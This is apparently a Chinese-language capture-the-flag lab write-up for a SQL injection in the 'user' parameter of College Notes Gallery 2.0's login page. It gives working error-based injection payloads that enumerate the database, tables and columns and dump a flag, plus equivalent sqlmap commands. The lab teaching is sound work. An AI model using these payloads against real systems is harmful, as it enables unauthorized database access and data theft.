简介
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
正文
这关有我用了两种办法,第一种是用报错注入进行手注,第二种就是sqlmap
首先进入靶场我们就可以看到有个login登录的按键,直接点进去。
第一种,报错注入
进入登录界面那就直接开始测试,我们进来就看到这里有个报错,那么就很明显的知道这里可以用报错注入。那么就开始测闭合,发现是单引号闭合。
爆数据库名
1'+and+(extractvalue(1,concat(0x7e,(select+database()),0x7e)))=1--+
爆表名
1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema='notes'),0x7e)))=1--+
爆列名
1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_schema='notes'+and+table_name='flllaaaag'),0x7e)))=1--+
爆内容
1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(flag)from+flllaaaag),0x7e)))=1--+
注意
这里因为报错注入输出是有限制长度的,所以我们需要用截断函数来把后面的的内容显示出来。
1'+and+(extractvalue(1,concat(0x7e,substr((select+group_concat(flag)from+flllaaaag),20,40),0x7e)))=1--+
第二种方式sqlmap
爆库名
python sqlmap.py -r 2.txt -batch -dbs
爆表名
python sqlmap.py -r 2.txt -batch -D notes -tables
爆列名
python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns
爆数据
python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump
